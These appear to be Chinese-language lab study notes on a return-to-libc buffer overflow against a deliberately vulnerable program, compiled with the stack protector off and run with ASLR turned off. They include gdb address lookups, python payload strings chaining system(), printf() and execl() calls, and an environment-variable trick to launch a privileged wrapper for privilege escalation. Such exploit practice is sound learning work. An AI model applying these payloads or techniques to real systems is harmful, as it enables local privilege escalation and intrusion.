不可执行内存页保护攻击--return to libc attack

@1. 基本思路
    控制eip使程序流程流向glibc函数，而不是shellcode所在的堆栈上。system(),exit()……
@2. 规划如下：
                缓冲区  --> 溢出
                ebp     --> 溢出
                eip     --> system()地址
                vars    --> 填充内容(一般是4个字节，作为system()返回之后的eip)
                        --> '/bin/sh'
@3. write vuln2.c and compile it with order 'gcc -mpreferred-stack-boundary=2 -fno-stack-protector -o viln2 vuln2.c '  去掉"-z execstack"是加上堆栈不可执行。
@4. 关闭地址随机化，echo 0 > /proc/sys/kernel/randomize_va_space
@5. find where is glibc's system() and where is "/bin/sh"
    在gdb里面寻找： (gdb) print system
                    $1 = {<text variable, no debug info>} 0xb7e52260 <__libc_system>
    使用程序search.c寻找：
                    编译search.c出错：在函数‘main’中：
                        search.c:(.text+0x6e)：对‘dlopen’未定义的引用
                        search.c:(.text+0x8a)：对‘dlsym’未定义的引用
                        search.c:(.text+0xc5)：对‘dlsym’未定义的引用
                        collect2: error: ld returned 1 exit status
                    问题描述：Undefined reference to 错误:这类错误是在连接过程中出现的，可能有两种原因∶一是使用者自己定义的函数或者全局变量所在源代码文件，没有被编译、连接，或者干脆还没有定义，这 需要使用者根据实际情况修改源程序，给出全局变量或者函数的定义体；二是未定义的符号是一个标准的库函数，在源程序中使用了该库函数，而连接过程中还没有 给定相应的函数库的名称，或者是该档案库的目录名称有问题.
                    解决：gcc -o search search.c -ldl (-lm)
                    result:
                        system() found at b7e51260
                        exit() found at b7e437f0
                        "/bin/sh" found at b7f79b98
@6. 构造溢出串。
    结果中的地址都小了0x1000
    ./vuln2 `python -c "print 'A'*11+'\x60\x22\xe5\xb7'+'\xf0\x47\xe4\xb7'+'\x98\xab\xf7\xb7'"`
@7. 提升权限。
    本地高权限程序wrapper.c，利用漏洞调用本地高权限程序即可提升权限。
    #1. 编写wrapper.c
    #2. execl('./wrapper', './wrapper', NULL)
        因此，需要找到execl()的地址、"./wrapper"地址（环境变量）、printf()地址，"%3\$n地址（环境变量）.
    #3.gdb
        print printf
        $1 = {<text variable, no debug info>} 0xb7e5f7d0 <__printf>
        
        print execl
        $2 = {<text variable, no debug info>} 0xb7ecbe40 <__GI_execl>
    #4.get_env.c  compiled file's name's length must be equal "vuln2"'s length(5)
    #5. store env_vars
        export FMTSTR="%3\$n"
        ./gtenv FMTSTR
            FMTSTR is located at 0xbffffa39
        export WRAPPER="./wrapper"
        ./gtenv WRAPPER
            WRAPPER is located at 0xbffffb1c
        ./gtenv NULL
            NULL is located at 0xbffffbfd
    #6. 构造假堆栈
            缓冲区  --> 溢出
            ebp     --> 溢出
            eip     --> printf()的地址
            ---     --> execl()的地址
            ---     --> "%3\$n"地址
            ---     --> "./wrapper"的地址
            ---     --> "./wrapper"的地址
            ---     --> paddings --> 该处使用了一个环境变量NULL的地址(在上面有列出)
        ./vuln2 `python -c "print 'A'*11+'\xd0\xf7\xe5\xb7'+'\x40\xbe\xec\xb7'+'\x39\xfa\xff\xbf'+'\x1c\xfb\xff\xbf'*2+'\xfd\xfb\xff\xbf'"`
    #7.反思，只要使用NULL环境变量给execl()提供最偶一个参数就可以了。
./vuln2 `python -c "print 'A'*11+'\x40\xbe\xec\xb7'+'BBBB'+'\x1c\xfb\xff\xbf'*2+'\xfd\xfb\xff\xbf'"`